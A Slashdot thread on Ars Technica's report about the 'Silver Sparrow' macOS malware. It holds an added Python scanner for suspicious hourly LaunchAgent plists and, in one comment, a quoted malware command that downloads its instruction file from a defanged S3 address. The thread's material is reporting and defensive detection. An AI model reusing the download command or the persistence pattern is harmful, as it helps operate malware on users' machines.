

Sophisticated New Malware Found on 30,000 Macs Stumps Security Pros (arstechnica.com) 66
Long-time Slashdot reader b0s0z0ku quotes Ars Technica:
A previously undetected piece of malware found on almost 30,000 Macs worldwide is generating intrigue in security circles, which are still trying to understand precisely what it does and what purpose its self-destruct capability serves.
Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the infected 30,000 machines, leaving the malware's ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.
Also curious, the malware comes with a mechanism to completely remove itself, a capability that's typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question why the mechanism exists. Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so...
The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany.
Red Canary, the security firm that discovered the malware, has named it "Silver Sparrow." Long-time Slashdot reader Nihilist_CE writes: First detected in August of 2020, the Silver Sparrow malware is interesting in several unsettling ways. It uses the macOS Installer Javascript API to launch a bash process to gain a foothold into the user's system, a hitherto-unobserved method for bypassing malware detection. This bash shell is then used to invoke macOS's built-in PlistBuddy tool to create a LaunchAgent which executes a bash script every hour. This is the command and control process, which downloads a JSON file containing (potentially) new instructions.
Besides the novel installation method, Silver Sparrow is also mysterious in its payload: a single, tiny binary that does nothing but open a window reading "Hello, World!" (in v1, which targets Intel Macs) or "You did it!" (in v2, which is an M1-compatible fat binary). These "bystander binaries" are never executed and appear to be proofs-of-concept or placeholders for future functionality.
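As an added defensive example (not code from the article, the Slashdot posters or Red Canary), the following Python flags LaunchAgent plists that match the persistence pattern described above: a shell interpreter launched on a 3600-second StartInterval. The label, script path and sample plists are constructed placeholders, not the real malware's.

```python
"""Flag user LaunchAgent plists matching the hourly shell-runner pattern.
Added example; sample plists below are constructed, not real indicators."""
import plistlib
from pathlib import Path
from xml.parsers.expat import ExpatError

SHELL_NAMES = {"sh", "bash", "zsh"}
HOUR = 3600  # the summary describes a job that fires once an hour


def launch_agent_findings(plist_bytes: bytes) -> list[str]:
    """Return the reasons a LaunchAgent looks like the pattern; empty list
    means nothing matched. Parse failures are reported as a finding too."""
    try:
        job = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ValueError, ExpatError):
        return ["plist could not be parsed"]
    findings = []
    args = job.get("ProgramArguments") or []
    program = args[0] if args else job.get("Program")
    if isinstance(program, str) and Path(program).name in SHELL_NAMES:
        findings.append(f"program is a shell interpreter: {program}")
    if job.get("StartInterval") == HOUR:
        findings.append("StartInterval is exactly 3600 seconds")
    if job.get("RunAtLoad") is True and findings:
        findings.append("also RunAtLoad, so it starts at every login")
    return findings


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Scan every .plist in a LaunchAgents directory; keys are file names
    that produced findings. Typical target: ~/Library/LaunchAgents."""
    hits = {}
    for plist_path in sorted(directory.glob("*.plist")):
        findings = launch_agent_findings(plist_path.read_bytes())
        if findings:
            hits[plist_path.name] = findings
    return hits


# Constructed samples: placeholder label and paths, modelled on the
# described pattern (bash + script + hourly interval) and on a benign agent.
SUSPICIOUS_AGENT = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/bash", "/Users/someone/Library/updater/run.sh"],
    "StartInterval": HOUR,
    "RunAtLoad": True,
})
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.helperapp",
    "ProgramArguments": ["/Applications/Helper.app/Contents/MacOS/Helper"],
    "KeepAlive": True,
})

if __name__ == "__main__":
    for name, data in (("suspicious", SUSPICIOUS_AGENT), ("benign", BENIGN_AGENT)):
        print(name, launch_agent_findings(data) or "no findings")
    agents_dir = Path.home() / "Library" / "LaunchAgents"
    if agents_dir.is_dir():
        print(scan_launch_agents(agents_dir))
```

A shell launched hourly is not proof of infection on its own (backup and sync helpers do the same), so treat hits as triage leads and read the referenced script.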
Where is the control server ? (Score:4, Insightful)
The article did not say so. Apple seems to know who did it as "Apple has revoked the developer certificate for both bystander binary files." - will we be told who they are (once checked out) ?
Re:Where is the control server ? (Score:5, Insightful)
It's probably easy to get a developer account anonymously, but just wait until Apple has its security chips sign apps and refuses to run apps not signed by the chip. Then they'll trace supply chain logistics on a machine's serial number.
"To combat malware," of course, but then subsequently whoever the Parler app developer is finds his machine unable to compile runnable code anymore.
"Find out why 2024 will be like 1984".
Re: Where is the control server ? (Score:3)
This has the makings of a good Babylon Bee article. Increase the humour, reduce the fantasy, and submit your draft. The trick is to be over the top while skirting Poe's law.
Re: Where is the control server ? (Score:5, Funny)
Poe's law? Nevermore!
Re: Where is the control server ? (Score:2)
Wish I had mod points... :)
Re: Where is the control server ? (Score:2)
Well played!
Re: Where is the control server ? (Score:4, Funny)
People have been raven' about that for a long time.
Re: (Score:2, Informative)
Amazon was warning Parler back in November about violating their TOS. https://www.npr.org/sections/i... [npr.org]
Jan 6th was the final straw.
Re: (Score:2)
The big tech companies literally and openly colluded to get rid of an app they didn't like.
...and?
I'm waiting for the punchline here. Colluding in this scenario isn't illegal. Nor was anything else that they did.
What's the source of your outrage? What is it that offends you so?
So far, the only thing I can conclude is:
The big tech companies literally and openly colluded to get rid of an app they didn't like, and I don't like that they did that.
Yep, that's about it. Nothing more to see here.
Moving on...
Re: Where is the control server ? (Score:2)
Sure, but how does that necessarily lead to blocking software compiled on a specific Mac? If you see a logical progression then why not skip straight to the final stage of mounting guns next to the webcam so Apple can remotely shoot transgressors against the Californian cult?
Re: (Score:2, Flamebait)
but just wait until Apple has its security chips sign apps and refuses to run apps not signed by the chip.
Right. Because Apple is willing to destroy their image of their computers being the preferred platform for creating content, which includes software, because someone found a virus.
Maybe instead we could see Apple create their own anti-malware defenses like Microsoft has done with Windows Defender.
Or maybe not. Because if Apple is making anti-malware scanning software for their computers then that would be an implied admission that Apple computers lack inherent security from their operating system policies
Re: (Score:2)
Current users might be locked in but future users are not. Attempts to lock people in too tight only puts people off and leads to a slow suicide by people not getting lassoed in, and people that can afford the hit of switching out clearing a path for others to follow.
Microsoft was nearly ended by their lock in attempts. At first this was from the government acting on complaints from their competition. Later on this came from the competition creating open standards and reverse engineering Microsoft's file
Re: (Score:3)
From TFS:
The server it downloads that JSON file from is the server in question.
Re: (Score:3, Informative)
curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json
plutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist
This is from the article. Looks like an s3 bucket of some sort.
Yeah, ideally the IP addresses/ranges. (Score:2)
Sigh (Score:5, Interesting)
You guys never played Plague Inc?
You wait until you're in as many places as possible and nobody has noticed, before you start doing any action which might give away your presence.
Honestly, there's nothing different about that - nor to having a "disinfect" action.
The only thing "new" here is that it has a target for the M1 arch, and even that - as the article points out - isn't unique.
This is hyperbole, it's just malware, this is exactly how malware works, and how malware is operated if the authors have half a brain.
Re:Sigh (Score:5, Interesting)
I had the same thought...not unusual for it to appear to not do anything, as you wait until everything is in place before activating. Likewise, regarding the statement that there is no sign the self destruct has activated, you wouldn't expect it to self destruct before it has been activated.
Then I put on my tin foil hat and thought perhaps the self destruct has been activated. Maybe that's why they found it on so few macs. It deployed and activated, completed its mission, and then was deactivated. The 30k that are left for some reason either didn't operate properly, or weren't turned on for the period where the control server was telling them to deactivate, or failed the uninstall somehow.
However, I don't know what sort of logging Macs do in this regard (either software installations or apps launching other apps). Maybe it's possible for them to tell that no software was activated by the software.
watching the access log for s3 bucket (Score:2)
Re: (Score:3)
This looks a lot like a proof-of-concept malware system built by a kid for lulz. Way back in the day, I wrote a trivial virus for Mac System 7.1 (you know, when an '040 was a good processor), just to see if I could do it. Fortunately it never got into the wild. This looks like the same level of effort.
Re: Sigh (Score:4, Insightful)
I think everyone did that at least once in their programming career, usually when young. First, it is exciting and against the rules, second, it teaches you and shows that you know a lot about a system.
Also, you gain the power to fight back. Which is good for self-confidence. And then you succeed at other things and you don't even need it anymore, which is a constant reminder of your own confidence.
Kinda a programmer rite of passage.
Re: (Score:2)
Kinda a programmer rite of passage.
Like "Hello World".
Re: (Score:2)
Re: (Score:2)
You guys never played Plague Inc?
You wait until you're in as many places as possible and nobody has noticed, before you start doing any action which might give away your presence.
Yep. It doesn't take a genius to figure out what the "unknown condition" is.
I'd say it's "when there's more than 30,000 Macs infected".
(or some other number)
Luckily no Mac is running any anti-malware program that can kick it off the disk.
Re: (Score:2)
You guys never played Plague Inc?
Did you not visit Slashdot this past year? Based on how people were talking about COVID it's clear they haven't even done something this basic.
Nonsense! (Score:5, Insightful)
Guys, it isn't even malware! The installer does weird things that are usually associated with malware, but the software actually does nothing but show a screen with a message. The "malware" was actually signed with a genuine developer certificate, so Apple would know who did it, and the developer certificates have been revoked which most likely means their account is closed.
Re:Nonsense! (Score:5, Insightful)
The real problem here is that we invented the word "malware" to replace "trojans", "viruses" and other annoying software because people are too stupid to differentiate between a self-installing, self-propagating virus and a trojan that needs to be installed by the user itself.
Re: (Score:1)
Trojans are malware. "DontBeAMoran"
The pedantic complaint you are looking for is "a trojan is not a virus". Nice try at looking intelligent.
Re: Nonsense! (Score:3)
His response in context was correct I think. The post he was responding to took issue that the malware wasn't sophisticated because it has to be installed by the user. Which itself is valid, since we often measure sophistication on its effectiveness in how easily it can spread undetected.
But the use of the word malware is often attributed to crap on a machine that is both damaging and you don't know about it. So I personally think it could be forgiven by assuming the use of the word malware meant someth
Re: (Score:3)
OP: "Guys, it isn't even malware!"
Response: "The real problem here is that we invented the word "malware" to replace..."
Trojans ARE malware, and the "real problem" isn't that the term "malware" was invented. It's irrelevant to the entire conversation what "category" of malware it is. So what context here makes his response correct?
"The post he was responding to took issue that the malware wasn't sophisticated because it has to be installed by the user."
Yes, a typical attack to denigrate someone else's com
Re: (Score:2)
I don't know how you understood it that way, but I never said that trojans aren't malware.
Let me explain it again: I said that malware is too broad of a description and that the word is a bit useless in describing the scope of the problem. Are computers getting infected by simply visiting a website, or does a stupid user need to enter his password to install something himself?
Re: (Score:2)
Change its name to Stupidware.
Re: (Score:3)
There's a huge difference between "trojan that 30,000 naive users accidentally installed because they wanted a browser toolbar with a purple talking gorilla in it" and "worm that infected 30,000 computers remotely through zero user intervention". The problem is that the average user doesn't care about the distinction, even though the difference is significant.
Re: (Score:2)
because people are too stupid to differentiate between a self-installing, self-propagating virus and a trojan that needs to be installed by the user itself.
Ultimately for a user it's a distinction without a difference when it comes to their security. We've proven quite well time and time again that users are either good at preventing infection from viruses and trojans, or are good at neither.
Re: (Score:2)
I've seen malware used to refer to cookies.
Re: (Score:2)
And everything we don't like is "evil". Welcome to the watering down of the English language. Hopefully nothing will come of it, just a lessening of the outrage.
Re: (Score:2)
And everything we want to remove is being "killed" or "deleted".
Slashdot is often guilty of that with their stupid "senators want to kill this bill" for example. You can't kill a bill, it's not a living thing.
Unless of course we're talking about "Kill Bill" which is a kick-ass two-parts movie.
Re: Nonsense! (Score:3)
1. Every malware isn't malware ... until it is. That is what the vector/payload separation is for.
2. Yes, it's script kiddie level. Nice if you are... say, 15. Practical, as it does the job, if you are 19. But if you're a grown man, and your "malware" requires the target to download and run the thing himself, then it keeping itself in the system really isn't making it pathetic anymore. :)
...any LESS pathetic. (Score:2)
I meant "isn't making it any LESS pathetic". Whoops.
Re:Nonsense! (Score:4, Insightful)
The malware is not "sophisticated". There is an installer that you need to download and install the malware yourself. So you only get it through utter user stupidity.
From the article: "It remains unclear precisely how or where the malware is being distributed or how it gets installed."
If they managed to get 30,000+ people to install it, that's quite interesting, especially as they say they don't know how that's been done. The level of sophistication (although it seems like a perfectly valid starting point for something much more) seems out of keeping with the number of installs or using fancy zero day exploits for a mass infection campaign. I suspect it was probably bundled with something, but do Mac users install as many random, dubious apps on desktops as they might on their phones? Given the hello world samples included it might just be a little developer's toy/debugging aid that accidentally got shipped with a legit product.
Re: (Score:2)
Re: (Score:2)
It's easy to get 30,000 people to install something. Get an ad that offers something they want for free. Free porn, free bitcoins, VLC or Flash player, better/free version of Adobe software whatever.
How big of an ad campaign would you need to get not just 30,000 clicks but 30,000 downloads and installs? Sounds expensive for something that, 6 months later, doesn't appear to have been used. If a week later they were all mining bitcoin I could understand it.
Re: (Score:2)
Free Slashdot account, get'em before they're all gone!
Re: (Score:2)
Did you even read the summary? The malware checks every hour with a server to see if there are new instructions, and those instructions could be most anything. Until the balloon goes up, this scout tries to keep a low profile.
Flawed prototype? (Score:5, Funny)
These 30,000 malfunctioned in that they did not execute the 'self-destruct' issued a while ago. Fortunately the other 2 million did fine.
Just make an honest effort (Score:5, Funny)
God, the distal end of the LGBTQ acronym is changing so fast I can hardly keep up.
Re: (Score:1)
Goddammit I just had an appendectomy, don't make me laugh!
Re: (Score:2)
Literally crying...
Thanks for that!
Software Firewall (Score:2)
how do we detect if we have it? (Score:2)
is someone gonna let us know how we can ensure we're not infected?
Let me save you the trouble of speculation. (Score:1)
I know exactly what this malware is, and I've seen a lot like it. It's only out there to be used against me, either directly or indirectly. The mystery activation clause is "I or someone I know buys one of these stupid things." And after it is activated, they'll deny all knowledge of it, collect it, study it, alter it, and redeploy it for themselves. Our government is corrupt.
They were too clever for their own good (Score:2)
For the love of Mike, JavaScript???? (Score:2)
I read somewhere that Macs were supposed to be secure. And the macOS installer has a JavaScript API? Sheesh, I'm sticking to Gentoo.
Re (Score:1)
JavaScript! (Score:2)
SEE GUYS, SEE! This is PROOF that JavaScript is a terrible piece of evil THAT CAN ONLY be used for EVIL THINGS! ZOMG JavaScript doesn't even HAVE TYPE SAFETY! And Node.JS relies on a package manager where you JUST DON'T KNOW WHAT EVIL IS BEING INSTALLED ON YOUR MACHINE!
Go away, JavaScript, and let me compile my program and its three dependencies in assembly language by hand.